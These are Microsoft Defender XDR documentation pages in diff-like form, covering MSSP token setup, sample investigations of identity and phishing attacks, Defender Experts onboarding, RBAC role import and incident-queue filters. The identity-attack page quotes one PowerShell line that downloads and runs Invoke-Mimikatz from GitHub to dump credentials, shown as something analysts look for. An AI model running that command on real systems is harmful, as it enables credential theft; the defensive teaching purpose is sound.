- grant_type = 'authorization_code'
- client_id = $clientId
- code = $code
- redirect_uri = $redirectUri
- resource = $resourceId
- client_secret = $secret
- }
-
- $tokenEndpoint = "$login/$tenantId/oauth2/token?"
- $Response = Invoke-RestMethod -Method Post -Uri $tokenEndpoint -Body $Body
- $token = $Response.access_token
- $refreshToken= $Response.refresh_token
-
- Write-Host " -- TOKEN - "
- Write-Host $token
-
- Write-Host " -- REFRESH TOKEN - "
- Write-Host $refreshToken
- ```
-4. Open an elevated PowerShell command prompt in the `MsspTokensAcquisition` folder.
-
-5. Run the following command:
- `Set-ExecutionPolicy -ExecutionPolicy Bypass`
-
-6. Enter the following commands: `.\MsspTokensAcquisition.ps1 -clientId <client_id> -secret <app_key> -tenantId <customer_tenant_id>`
-
- - Replace \<client_id\> with the **Application (client) ID** you got from the previous step.
- - Replace \<app_key\> with the **Client Secret** you created from the previous step.
- - Replace \<customer_tenant_id\> with your customer's **Tenant ID**.
-
-7. You'll be asked to provide your credentials and consent. Ignore the page redirect.
-
-8. In the PowerShell window, you'll receive an access token and a refresh token. Save the refresh token to configure your SIEM connector.
-
-<a name='step-3-allow-your-application-on-microsoft-365-defender'></a>
-
-### Step 3: Allow your application on Microsoft Defender XDR
-
-You'll need to allow the application you created in Microsoft Defender XDR.
-
-You'll need to have **Manage portal system settings** permission to allow the application. Otherwise, you'll need to request your customer to allow the application for you.
-
-1. Go to `https://security.microsoft.com?tid=<customer_tenant_id>` (replace \<customer_tenant_id\> with the customer's tenant ID.
-
-2. Click **Settings** \> **Endpoints** \> **APIs** \> **SIEM**.
-
-3. Select the **MSSP** tab.
-
-4. Enter the **Application ID** from the first step and your **Tenant ID**.
-
-5. Click **Authorize application**.
-
-You can now download the relevant configuration file for your SIEM and connect to the Microsoft Defender XDR API. For more information, see, [Pull alerts to your SIEM tools](../defender-endpoint/configure-siem.md).
--- In the ArcSight configuration file / Splunk Authentication Properties file, write your application key manually by setting the secret value.-- Instead of acquiring a refresh token in the portal, use the script from the previous step to acquire a refresh token (or acquire it by other means).-
-## Fetch alerts from MSSP customer's tenant using APIs
-
-For information on how to fetch alerts using REST API, see [Pull alerts using REST API](../defender-endpoint/pull-alerts-using-rest-api.md).
-
-## Related topics
-
-[Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)
security First Incident Path Identity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-path-identity.md
- Title: Example of an identity-based attack
-description: Step through an example analysis of an identity-based attack.
-
- - NOCSH
----
- - m365-security
- - m365solution-firstincident
- - highpri
- - tier1
-
- - MOE150
- - MET150
Previously updated : 04/20/2021--
-# Example of an identity-based attack
--
-**Applies to:**
-- Microsoft Defender XDR-
-Microsoft Defender for Identity can help detect malicious attempts to compromise identities in your organization. Because Defender for Identity integrates with Microsoft Defender XDR, security analysts can have visibility on threats coming in from Defender for Identity, such as suspected Netlogon privilege elevation attempts.
-
-## Analyzing the attack in Microsoft Defender for Identity
-
-Microsoft Defender XDR allows analysts to filter alerts by detection source on the **Alerts** tab of the incidents page. In the following example, the detection source is filtered to **Defender for Identity**.
--
-Selecting the **Suspected overpass-the-hash attack** alert goes to a page in Microsoft Defender for Cloud Apps that displays more detailed information. You can always find out more about an alert or attack by selecting **Learn more about this alert type** to read a [description of the attack](/defender-for-identity/lateral-movement-alerts#suspected-overpass-the-hash-attack-kerberos-external-id-2002) and remediation suggestions.
-
-
-## Investigating the same attack in Microsoft Defender for Endpoint
-
-Alternatively, an analyst can use Defender for Endpoint to learn more about the activity on an endpoint. Select the incident from the incident queue, then select the **Alerts** tab. From here, they can identify the detection source as well. A detection source labeled as EDR stands for Endpoint Detection and Response, which is Defender for Endpoint. From here, the analyst selects an alert detected by EDR.
--
-The alert page displays various pertinent information such as the impacted device name, username, status of auto-investigation, and the alert details. The alert story depicts a visual representation of the process tree. The process tree is a hierarchical representation of parent and child processes related to the alert.
--
-Each process can be expanded to view more details. Details that an analyst can see are the actual commands that were entered as part of a malicious script, outbound connection IP addresses, and other useful information.
-
-
-By selecting **See in timeline**, an analyst can drill down even further to determine the exact time of the compromise.
-
-Microsoft Defender for Endpoint can detect many malicious files and scripts. However, due to many legitimate uses for outbound connections, PowerShell, and command-line activity, some activity would be considered benign until it creates a malicious file or activity. Therefore, using the timeline helps analysts to put the alert into context with the surrounding activity to determine the original source or time of the attack that otherwise is obscured by common file system and user activity.
-
-To use the timeline, an analyst would start at the time of the alert detection (in red) and scroll down backwards in time to determine when the original activity that led to the malicious activity actually started.
--
-It is important to understand and distinguish common activity such as Windows Update connections, Windows Trusted Software activation traffic, other common connections to Microsoft sites, third-party Internet activity, Microsoft Endpoint Configuration Manager activity, and other benign activity from suspicious activity. One way to distinguish is by using timeline filters. There are many filters that can highlight specific activity while filtering out anything that the analyst does not want to view.
-
-In the image below, the analyst filtered to view only network and process events. This filter criteria allows the analyst to see the network connections and processes surrounding the event where Notepad established a connection with an IP address, which we also saw in the process tree.
--
-In this particular event, Notepad was used to make a malicious outbound connection. However, often attackers will use iexplorer.exe to establish connections to download a malicious payload because ordinarily iexplorer.exe processes are considered regular web browser activity.
-
-Another item to look for in the timeline would be PowerShell uses for outbound connections. The analyst would look for successful PowerShell connections with commands such as `IEX (New-Object Net.Webclient)` followed by an outbound connection to a website hosting a malicious file.
-
-In the following example, PowerShell was used to download and execute Mimikatz from a website:
-
-```powershell
-IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
-```
-An analyst can quickly search for keywords by typing in the keyword in the search bar to display only events created with PowerShell.
-
-## Next step
-
-See the [phishing](first-incident-path-phishing.md) investigation path.
-
-## See also
--- [Incidents overview](incidents-overview.md)-- [Manage incidents](manage-incidents.md)-- [Investigate incidents](investigate-incidents.md)
security First Incident Path Phishing https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-path-phishing.md
- Title: Example of a phishing email attack
-description: Step through an example analysis of a phishing attack.
-
- - NOCSH
----
- - m365-security
- - m365solution-firstincident
- - highpri
- - tier1
-
- - MOE150
- - MET150
Previously updated : 04/20/2021--
-# Example of a phishing email attack
--
-**Applies to:**
-- Microsoft Defender XDR-
-Microsoft Defender XDR can help detect malicious attachments delivered via email and security analysts can have visibility on threats coming in from Office 365, such as through email attachments.
-
-For example, an analyst was assigned a multi-stage incident.
-
-
-In the **Alerts** tab of the incident, alerts from Defender for Office 365 and Microsoft Defender for Cloud Apps are displayed. The analyst can drill down into the Defender for Office 365 alerts by selecting the email messages alerts. The details of the alert are displayed on the side pane.
-
-
-By scrolling down further, more information is displayed, showing the malicious files and user that was impacted.
-
-
-Selecting **Open alert page** takes you to the specific alert where various information can be viewed in greater detail by selecting the link. The actual email message can be viewed by selecting **View messages in Explorer** toward the bottom of the panel.
-
-
-This takes the analyst to the Threat Management page where the email Subject, Recipient, Sender, and other information are displayed. **ZAP** under **Special Actions** tells the analyst that the Zero-hour auto purge feature was implemented. ZAP automatically detects and removes malicious and spam messages from mailboxes across the organization. For more information, see [Zero-hour auto purge (ZAP) in Exchange Online](../office-365-security/zero-hour-auto-purge.md).
-
-Other actions can be taken on specific messages by selecting **Actions**.
-
-
-## Next step
-
-See the [identity-based attack](first-incident-path-identity.md) investigation path.
-
-## See also
--- [Incidents overview](incidents-overview.md)-- [Investigate incidents](investigate-incidents.md)-- [Manage incidents](manage-incidents.md)
security Frequently Asked Questions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/frequently-asked-questions.md
- Title: FAQs related to Microsoft Defender Experts for XDR-
-description: Frequently asked questions related to Defender Experts for XDR
------
- - m365-security
- - tier1
- Previously updated : 08/29/2023--
-# General information on Defender Experts for XDR service
-
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-
-| Questions | Answers |
-|||
-| **How is Microsoft Defender Experts for XDR different from Microsoft Defender Experts for Hunting?** | [Microsoft Defender Experts for Hunting](../defender/defender-experts-for-hunting.md) provides proactive threat hunting service to proactively find threats. This service is meant for customers that have a robust security operations center and want that deep expertise in hunting to expose advanced threats. Microsoft Defender Experts for XDR provides end-to-end security operations capabilities to monitor, investigate, and respond to security alerts. This service is meant for customers with constrained security operations centers (SOCs) that are overburdened with alert volume, in need of skilled experts, or both. Defender Experts for XDR also includes the proactive threat hunting offered by Defender Experts for Hunting|
-| **Does Defender Experts for XDR require Microsoft Sentinel?** | No. Defender Experts can use Microsoft Defender XDR data in customers' original locations for each Microsoft Defender XDR product deployed. |
-| **What products does Defender Experts for XDR operate on?** | Refer to the [Before you begin](before-you-begin-xdr.md) for details. |
-| **Does Defender Experts for XDR replace my SOC team?** | Defender Experts for XDR currently provide coverage for Microsoft Defender XDR incidents. It's the ideal way to augment your SOC team, reduce their workload, and collaborate with them to protect your organization from activity groups. |
-| **What actions can your experts take during incident investigation?** | Our expert analysts can take actions based on the roles granted to them in your Microsoft Defender portal. If our analysts are granted a security reader role, they can investigate and provide managed response for your SOC team to act on. If our analysts are granted a security operator role, they can also take specific remediation actions agreed upon with your SOC team. |
-| **What types of incidents can your experts investigate?** | Defender Experts for XDR covers incidents categorized as High or Medium severity in Windows, Linux, and macOS devices. Incidents categorized as Compliance, Data Loss Prevention (DLP), or Custom Detections and those affecting internet of things (IoT), iOS, or Android devices are outside the service's scope. |
-| **Can your experts help me improve my security posture?** | Yes, our experts provide necessary guidance regularly to improve your security posture.
-| **Can Defender Experts for XDR help with an active compromise or vulnerability?** | No, Defender Experts currently don't provide incident response services. Contact your Microsoft representative or fill out the [Experiencing a Cybersecurity Incident?](https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=v4j5cvGGr0GRqy180BHbRypQlJUvhTFIvfpiAfrpFQdUOTdRRFpDUFQ1TzNLVFZXV0VUOVlVN0szUiQlQCN0PWcu) form to engage Microsoft Incident Response for incident response assistance. |
-| **How can my organization participate in the Defender Experts for XDR service?** | Contact your Microsoft representative to express interest in Defender Experts for XDR.|
-
-### See also
-
-[How Microsoft Defender Experts for XDR permissions work](dex-xdr-permissions.md)
security Get Started Xdr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/get-started-xdr.md
- Title: Get started with Microsoft Defender Experts for XDR-
-description: Defender Experts for XDR lets you determine the individuals or groups within your organization that need to be notified if there's a critical incident
------
- - m365-security
- - tier1
- - essentials-get-started
- Previously updated : 01/30/2024--
-# Get started with Microsoft Defender Experts for XDR
-
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-
-Once the Defender Experts for XDR team is ready to onboard your organization, you'll receive a welcome email to continue the setup and get you started.
-
-Select the link in the welcome email to directly launch the Defender Experts settings setup in the Microsoft Defender portal. You can also open this setup by going to **Settings** > **Defender Experts** and selecting **Get started**.
--
-## Grant permissions to our experts
-
-By default, Defender Experts for XDR requires **Service provider access** that lets our experts sign into your tenant and deliver services based on assigned security roles. [Learn more about cross-tenant access](/azure/active-directory/external-identities/cross-tenant-access-overview)
-
-You also need to grant our experts one or both of the following permissions:
--- **Investigate incidents and guide my responses** (default) ΓÇô This option lets our experts proactively monitor and investigate incidents and guide you through any necessary response actions. (Access level: Security Reader)-- **Respond directly to active threats** (recommended) ΓÇô This option lets our experts contain and remediate active threats immediately while investigating, thus reducing the threat's impact, and improving your overall response efficiency. (Access level: Security Operator)--
-> [!IMPORTANT]
-> If you skip providing additional permissions, our experts won't be able to take certain response actions to secure your organization.
->
-> Even though our experts are granted these relatively powerful permissions, they will only have individual access to specific areas for a limited period. [Learn more about how Defender Experts for XDR permissions work](../defender/dex-xdr-permissions.md)
-
-**To grant our experts permissions:**
-
-1. In the same Defender Experts settings setup, under **Permissions**, choose the access level(s) you want to grant our experts.
-1. If you wish to [exclude device and user groups](#exclude-devices-from-remediation) in your organization from remediation actions, select **Manage exclusions**.
-1. Select **Next** to [add contact persons or groups](#tell-us-who-to-contact-for-important-matters).
-
-To edit or update permissions after the initial setup, go to **Settings** > **Defender Experts** > **Permissions**.
-
-## Exclude devices from remediation
-
-Defender Experts for XDR lets you exclude devices and users from remediation actions taken by our experts and instead get remediation guidance for those entities. These exclusions are based on identified [device groups](../defender-endpoint/machine-groups.md) in Microsoft Defender for Endpoint<!--and identified [user groups](/entra/fundamentals/concept-learn-about-groups) in Microsoft Entra ID-->.
-
-**To exclude device groups:**
-
-1. In the same Defender Experts settings setup, under **Exclusions**, go to the **Device groups** tab.
-2. Select **+ Add device groups**, then search for and choose the device group(s) that you wish to exclude.
- > [!NOTE]
- > This page only lists existing device groups. If you wish to create a new device group, you first need to go to the Defender for Endpoint settings in your Microsoft Defender portal. Then, refresh this page to search for and choose the newly created group. [Learn more about creating device groups](../defender-endpoint/machine-groups.md)
-
-3. Select **Add device groups**.
-4. Back on the **Device groups** tab, review the list of excluded device groups. If you wish to remove a device group from the exclusion list, choose it then select **Remove device group**.
-5. Select **Next** to confirm your exclusion list and proceed to [adding contact persons or groups](#tell-us-who-to-contact-for-important-matters). Otherwise, select **Skip**, and all your added exclusions are discarded.
--
-<!--**To exclude user groups:**
-
-1. In the same Defender Experts settings setup, under **Exclusions**, go to the **User groups** tab.
-2. Select **+ Add user groups**, then search for and choose the user group(s) that you wish to exclude.
- > [!NOTE]
- > This page only lists existing user groups. If you wish to create a new user group, you first need to sign into the Microsoft Entra ID admin center as a Global Administrator. Then, refresh this page to search for and choose the newly created group. [Learn more about creating user groups](/entra/fundamentals/groups-view-azure-portal)
-
-3. Select **Add user groups**.
-4. Back on the **User groups** tab, review the list of excluded user groups. If you wish to remove a user group from the exclusion list, choose it then select **Remove user group**.
-5. Select **Next** to confirm your exclusion list and proceed to [adding contact persons or groups](#tell-us-who-to-contact-for-important-matters). Otherwise, select **Skip**, and all your added exclusions are discarded.
--
-To edit or update exclusions after the initial setup, go to **Settings** > **Defender Experts** > **Exclusions**, then go to the **Device groups** or **User groups** tab.
>
-<!--
-### Exclude all high-value devices or users automatically
-
-Defender Experts for XDR also lets you exclude automatically identified high-value devices and users, such as key executives, or sensitive admins, from remediation actions by our experts:
--- **High-value devices** are devices in your organization that were [identified as such](../defender-vulnerability-management/tvm-assign-device-value.md) in Defender for Endpoint-- **High-value users** are users in your organization that were tagged with the [Sensitive tag](/defender-for-identity/entity-tags#sensitive--tags) in Microsoft Defender for Identity and the [priority account tag](/microsoft-365/admin/setup/priority-accounts) in Microsoft Defender for Office 365-
-Similar to the other excluded device or user groups, you instead get remediation guidance for these high-value entities when they're excluded.
-> [!IMPORTANT]
-> By using this feature, you will also exclude automatically all devices and users that will be tagged as high-value in the future.
-
-**To exclude all high-value devices or users automatically:**
-
-1. In the same Defender Experts settings setup, under Exclusions, go to the **Device groups** or the **User groups** tab.
-2. Turn on **Exclude all high-value devices** or **Exclude all high-value users**.
--
-> [!NOTE]
-> Unlike the other excluded device and user groups, excluded high-value entities aren't listed in the **Device groups** or **User groups** tab.
>-
-## Tell us who to contact for important matters
-
-Defender Experts for XDR lets you determine the individuals or groups within your organization that need to be notified if there are critical incidents, service updates, occasional queries, and other recommendations:
--- **Incident notification contacts** ΓÇô These contacts are persons or teams that we can notify for managed response actions or any communication that requires immediate response. Given the urgent nature of the communications, we recommended that these contacts are always available.-- **Service review contacts** ΓÇô These contacts are persons or teams that we can engage with for ongoing security briefings done by our service delivery team.-
-Once identified, the individuals or groups will receive an email notifying them that they were as a contact for incident notification or service review purposes.
--
-**To add notification contacts:**
-
-1. In the same Defender Experts settings setup, under **Contacts**, search for and add your **Contact person or team** in the text field provided.
-2. Add a **Phone number** (optional) that Defender Experts can call for matters that require immediate attention.
-3. Under the **Contact for** dropdown box, choose **Incident notification** or **Service review**.
-4. Select **Add**.
-1. Select **Next** to confirm your contacts list and proceed to [creating a Teams channel](#receive-managed-response-notifications-and-updates-in-microsoft-teams) where you can also receive incident notifications.
-
-To edit or update your notification contacts after the initial setup, go to **Settings** > **Defender Experts** > **Notification contacts**.
--
-## Receive managed response notifications and updates in Microsoft Teams
-
-Apart from email and [in-portal chat](communicate-defender-experts-xdr.md#in-portal-chat), you also have to option to use Microsoft Teams to receive updates about managed responses and communicate with our experts in real time. When this setting is turned on, a new team named **Defender Experts team** is created, where managed response notifications related to ongoing incidents are sent as new posts in the **Managed response** channel. [Learn more about using Teams chat](communicate-defender-experts-xdr.md#teams-chat)
-
-> [!IMPORTANT]
-> Defender Experts will have access to all messages posted on any channel in the created **Defender Experts team**. To prevent Defender Experts from accessing messages in this team, go to **Apps** in Teams then navigate to **Manage your apps** > **Defender Experts** > **Remove**. This removal action cannot be reversed.
-
-**To turn on Teams notifications and chat:**
-
-1. In the same Defender Experts settings setup, under **Teams**, select the **Communicate on Teams** checkbox.
-2. Select **Next** to review your settings.
-3. Select **Submit**. The step-by-step guide then completes the initial setup.
-4. Select **View readiness assessment** to complete the necessary actions required to [optimize your security posture](#prepare-your-environment-for-the-defender-experts-service).
-
-> [!NOTE]
-> To set up the Defender Experts Teams application, you must have either the **Global administrator** or **Security administrator** role assigned, and a Microsoft Teams license.
-
-To turn on Teams notifications and chat after the initial setup, go to **Settings** > **Defender Experts** > **Teams**.
--
-You can add new members to the channel by navigating to **Defender Experts team** \> **More options (...)** > **Manage team** > **Add member**.
-
-## Prepare your environment for the Defender Experts service
-
-Apart from onboarding service delivery, our expertise on the Microsoft Defender XDR product suite enables Defender Experts for XDR to let you run a **readiness assessment** and help you get the most out of your Microsoft security products.
-
-The readiness assessment is based on the number of protected devices and identities in your environment, and Defender Experts' policy recommendations. To view the assessment, in your Microsoft Defender portal, go to **Settings** > **Defender Experts** then select **Service status**.
--
-The readiness assessment has two parts:
--- **Actions needed** ΓÇô This section shows the number of actions or security settings that you need to complete, are in progress, or have been completed. These actions are listed in a table at the bottom part of the page.-
- The list outlines the required steps you need to take before initiating the service. Prioritize the actions that have the **Complete now** status to get the Defender Experts for XDR service started sooner.
-
- > [!NOTE]
- > It can take up to 24 hours to get the latest status of your security settings.
--- **Protected assets** ΓÇô This section shows the current number of protected devices and identities versus the ones that you still need to protect to get the Defender Experts for XDR service started.-
- The figures are based on your Defender for Endpoint and Defender for Identity licenses; to achieve these target number of protected assets, [onboard more devices](../defender-endpoint/onboarding.md) to Defender for Endpoint or [install more Defender for Identity sensors](/defender-for-identity/install-sensor).
-
-> [!IMPORTANT]
-> Defender Experts for XDR reviews your readiness assessment periodically, especially if there are any changes to your environment, such as the addition of new devices and identities. It's important that you regularly monitor and run the readiness assessment beyond the initial onboarding to ensure that your environment has strong security posture to reduce risk.
-
-After you complete all the required tasks and met the onboarding targets in your readiness assessment, your service delivery manager (SDM) initiates the monitoring phase of the Defender Experts for XDR service, where, for a few days, our experts start monitoring your environment closely to identify latent threats, sources of risk, and normal activity. As we get better understanding of your critical assets, we can streamline the service and fine-tune our responses.
-
-Once our experts begin to perform comprehensive response work on your behalf, you'll start receiving [notifications about incidents](managed-detection-and-response-xdr.md#incident-updates) that require remediation steps and targeted recommendations on critical incidents. You can also [chat with our experts](communicate-defender-experts-xdr.md) or your SDMs regarding important queries and regular business and security posture reviews, and [view real-time reports](reports-xdr.md) on the number of incidents we've investigated and resolved on your behalf.
-
-### Next step
--- [Managed detection and response](managed-detection-and-response-xdr.md)-- [Get real-time visibility with Defender Experts for XDR reports](reports-xdr.md)-- [Communicating with experts in the Microsoft Defender Experts for XDR service](communicate-defender-experts-xdr.md)-
-### See also
--- [General information on Defender Experts for XDR service](frequently-asked-questions.md)-- [How Microsoft Defender Experts for XDR permissions work](dex-xdr-permissions.md)-
security Get Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/get-started.md
- Title: Get started with Microsoft Defender XDR-
-description: Learn what steps you need to take to get started with Microsoft Defender XDR
-----
- - m365-security
- - m365solution-getstarted
- - highpri
- - tier1
- - essentials-overview
- - essentials-get-started
-- Previously updated : 04/10/2024--
-# Get started with Microsoft Defender XDR
--
-**Applies to:**
-- Microsoft Defender XDR-
-Microsoft Defender XDR is a unified experience where you can monitor and manage security across your enterprise. With the integrated alerts across identities, endpoints, data, apps, email, and collaboration tools - investigating and responding to threats now happen in a central location.
-
-Watch this short video to learn how Microsoft Defender XDR helps to prevent, detect, investigate, and remediate threats across Microsoft 365.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4FTDg]
-
-Whether you're new to the Microsoft suite of security products or familiar with individual workflows, this topic will guide you in the simple steps you need to take to get started with Microsoft Defender XDR.
--
-In general, you'll need to take the following steps to get started:
--- **[Step 1: Turn on Microsoft Defender XDR](m365d-enable.md)** <br>
- You'll first need to turn on the service by making sure you have the right license in place and roles are assigned so that you can access the portal.
-
- You'll then go through some simple settings and then you can confirm that the service is on.
--- **[Step 2: Deploy supported services](deploy-supported-services.md)** <br>
- After completing the initial steps, you'll need to deploy the supported services that come with Microsoft Defender XDR. Deploying services effectively increases your visibility in the signals from assets across your network.
--
-## Key capabilities
-
-Turning on Microsoft Defender XDR and deploying services will give you access to the following key capabilities:
--
-| Capability | Description |
-| | |
-| Microsoft Defender for Endpoint | Endpoint protection suite built around powerful behavioral sensors, cloud analytics, and threat intelligence |
-|Microsoft Defender for Office 365 | Advanced protection for your apps and data in Office 365, including email and other collaboration tools |
-| Microsoft Defender for Identity | Defend against advanced threats, compromised identities, and malicious insiders using correlated Active Directory signals |
-| Microsoft Defender for Cloud Apps | Identify and combat cyberthreats across your Microsoft and third-party cloud services |
security Import Rbac Roles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/import-rbac-roles.md
- Title: Import roles to Microsoft Defender XDR Unified role-based access control (RBAC)
-description: Create custom Microsoft Defender XDR Security portal role-based access control (RBAC)
------- m365-security-- tier3-- Previously updated : 08/03/2023---
-# Import roles to Microsoft Defender XDR Unified role-based access control (RBAC)
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Identity](https://go.microsoft.com/fwlink/?LinkID=2198108)-- [Microsoft Defender for Office 365 P2](https://go.microsoft.com/fwlink/?LinkID=2158212)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction)-
-<a name='import-roles-to-microsoft-365-defender-unified-rbac-from-individual-rbac-models'></a>
-
-## Import roles to Microsoft Defender XDR Unified RBAC from individual RBAC models
-
-You can import existing roles that are maintained as part of individual supported products in Microsoft Defender XDR (for example, Microsoft Defender for Endpoint) to the Microsoft Defender XDR Unified RBAC model.
-
-Importing roles will migrate and maintain the roles with full parity in relation to their permissions and user assignments in the Microsoft Defender XDR Unified RBAC model.
-
-> [!NOTE]
-> Once roles are migrated, you can modify the imported roles and change the level of permissions as needed.
-
-The following steps guide you on how to import roles into Microsoft Defender XDR Unified RBAC:
-
-> [!IMPORTANT]
-> You must be a Global Administrator or Security Administrator in Microsoft Entra ID, or have all the **Authorization** permissions assigned in Microsoft Defender XDR Unified RBAC to perform this task. For more information on permissions, see [Permission pre-requisites](../defender/manage-rbac.md#permissions-pre-requisites).
-
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com).
-2. In the navigation pane, select **Permissions**.
-3. Select **Roles** under Microsoft Defender XDR to get to the Permissions and roles page.
-4. Select **Import role**.
-5. Select the products you want to import roles from.
-
- :::image type="content" source="../../media/defender/m365-defender-import-workloads.png" alt-text="Screenshot of the import workloads page" lightbox="../../media/defender/m365-defender-import-workloads.png":::
-
-6. Select **Next** to choose the roles to import. You can choose all roles or select specific roles from the list. Select the role name to review the permissions and assigned users or groups for that specific role.
-7. Select the roles you want to import and select **Next**.
-
-> [!NOTE]
-> If the role you want to import appears in the **Roles not eligible for import** list, it contains assignments for users or user groups that no longer exist in Entra ID.
->
-> To import this role to Unified RBAC, remove the user or user group from the role in the original RBAC model. Select the role to view the list of users that still exist for that role to determine which user or group to remove.
-
-8. Select **Submit**.
-9. Select **Done** on the confirmation page.
-
-Now that you have imported your roles you will be able to [View and edit roles](edit-delete-rbac-roles.md) and activate the workloads.
-
-For the Microsoft Defender XDR security portal to start enforcing the permissions and assignments configured in your new or imported roles, you'll need to activate the new Microsoft Defender XDR Unified RBAC model. For more information, see [Activate the workloads](activate-defender-rbac.md).
-
-Imported roles appear in the **Permissions and roles** list together with any custom roles you might have created. All imported roles will be marked as **Imported** in the description. Once you edit an imported role it will no longer be marked as **Imported**.
-
-> [!NOTE]
-> You can import roles as frequently as required. After you edit an imported role, the changes will not affect the original role where it was imported from. This means you have the option to delete an imported role and re-import the original role, if required. If you import the same role twice you will create a duplicate role.
-
-## Next steps
--- [Activate Microsoft Defender XDR Unified RBAC](activate-defender-rbac.md)-- [Edit or delete roles](edit-delete-rbac-roles.md)-
security Incident Queue https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/incident-queue.md
- Title: Prioritize incidents in the Microsoft Defender portal
-description: Learn how to filter incidents from the incident queue in the unified security operations platform in the Microsoft Defender portal.
-
- - NOCSH
----
- - m365-security
- - usx-security
- - tier1
--
- - MOE150
- - MET150
Previously updated : 03/29/2024
-appliesto:
-- Microsoft Defender XDR -- Microsoft Sentinel in the Microsoft Defender portal--
-# Prioritize incidents in the Microsoft Defender portal
-
-The unified security operations platform in the Microsoft Defender portal applies correlation analytics and aggregates related alerts and automated investigations from different products into an incident. Microsoft Sentinel and Defender XDR also trigger unique alerts on activities that can only be identified as malicious given the end-to-end visibility in the unified platform across the entire suite of products. This view gives your security analysts the broader attack story, which helps them better understand and deal with complex threats across your organization.
--
-## Incident queue
-
-The **Incident queue** shows a collection of incidents that were created across devices, users, mailboxes, and other resources. It helps you sort through incidents to prioritize and create an informed cybersecurity response decision, a process known as incident triage.
-
-> [!TIP]
-> For a limited time during January 2024, when you visit the **Incidents** page, Defender Boxed appears. Defender Boxed highlights your organization's security successes, improvements, and response actions during 2023. To reopen Defender Boxed, in the Microsoft Defender portal, go to **Incidents**, and then select **Your Defender Boxed**.
-
-You can get to the incident queue from **Incidents & alerts > Incidents** on the quick launch of the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>. Here's an example.
--
-Select **Most recent incidents and alerts** to toggle the expansion of the top section, which shows a timeline graph of the number of alerts received and incidents created in the last 24 hours.
--
-Below that, the incident queue in the Microsoft Defender portal displays incidents seen in the last six months. The most recent incident is at the top of the list so you can see it first. You can choose a different time frame by selecting it from the drop-down at the top.
-
-The incident queue has customizable columns (select **Customize columns**) that give you visibility into different characteristics of the incident or the impacted entities. This filtering helps you make an informed decision regarding the prioritization of incidents for analysis.
--
-### Incident names
-
-For more visibility at a glance, Microsoft Defender XDR generates incident names automatically, based on alert attributes such as the number of endpoints affected, users affected, detection sources, or categories. This specific naming allows you to quickly understand the scope of the incident.
-
-For example: *Multi-stage incident on multiple endpoints reported by multiple sources.*
-
-If you onboarded Microsoft Sentinel to the unified security operations platform, then any alerts and incidents coming from Microsoft Sentinel are likely to have their names changed (regardless of whether they were created before or since the onboarding).
-
-We recommend that you avoid using the incident name as a condition for triggering [automation rules](/azure/sentinel/automate-incident-handling-with-automation-rules). If the incident name is a condition, and the incident name changes, the rule will not be triggered.
-
-## Filters <a name="available-filters"></a>
-
-The incident queue also provides multiple filtering options, that when applied, enable you to perform a broad sweep of all existing incidents in your environment, or decide to focus on a specific scenario or threat. Applying filters on the incident queue can help determine which incident requires immediate attention.
-
-The **Filters** list above the list of incidents shows the currently applied filters.
-
-From the default incident queue, you can select **Add filter** to see the **Add filter** drop-down, from which you specify filters to apply to the incidents queue to limit the set of incidents shown. Here's an example.
--
-Select the filters you want to use, then select **Add** at the bottom of the list to make them available.
-
-Now the filters you selected are shown along with the existing applied filters. Select the new filter to specify its conditions. For example, if you chose the "Service/detection sources" filter, select it to choose the sources by which to filter the list.
-
-You can also see the **Filter** pane by selecting any of the filters in the **Filters** list above the list of incidents.
-
-This table lists the filter names that are available.
-
-| Filter name | Description/Conditions |
-|:-|:--|
-| **Status** | Select **New**, **In progress**, or **Resolved**. |
-| **Alert severity<br>Incident severity** | The severity of an alert or incident is indicative of the impact it can have on your assets. The higher the severity, the bigger the impact and typically requires the most immediate attention. Select **High**, **Medium**, **Low**, or **Informational**. |
-| **Incident assignment** | Select the assigned user or users. |
-| **Multiple service sources** | Specify whether the filter is for more than one service source. |
-| **Service/detection sources** | Specify incidents that contain alerts from one or more of the following:<li>Microsoft Defender for Identity<li>Microsoft Defender for Cloud Apps<li>Microsoft Defender for Endpoint<li>Microsoft Defender XDR<li>Microsoft Defender for Office 365<li>App Governance<li>Microsoft Entra ID Protection<li>Microsoft Data Loss Prevention<li>Microsoft Defender for Cloud<li>Microsoft Sentinel<br><br>Many of these services can be expanded in the menu to reveal further choices of detection sources within a given service. |
-| **Tags** | Select one or multiple tag names from the list. |
-| **Multiple category** | Specify whether the filter is for more than one category. |
-| **Categories** | Choose categories to focus on specific tactics, techniques, or attack components seen. |
-| **Entities** | Specify the name of an asset such as a user, device, mailbox, or application name. |
-| **Data sensitivity** | Some attacks focus on targeting to exfiltrate sensitive or valuable data. By applying a filter for specific sensitivity labels, you can quickly determine if sensitive information has potentially been compromised and prioritize addressing those incidents. <br><br> This filter displays information only when you've applied [sensitivity labels from Microsoft Purview Information Protection](../../compliance/sensitivity-labels.md). |
-| **Device groups** | Specify a [device group](/windows/security/threat-protection/microsoft-defender-atp/machine-groups) name. |
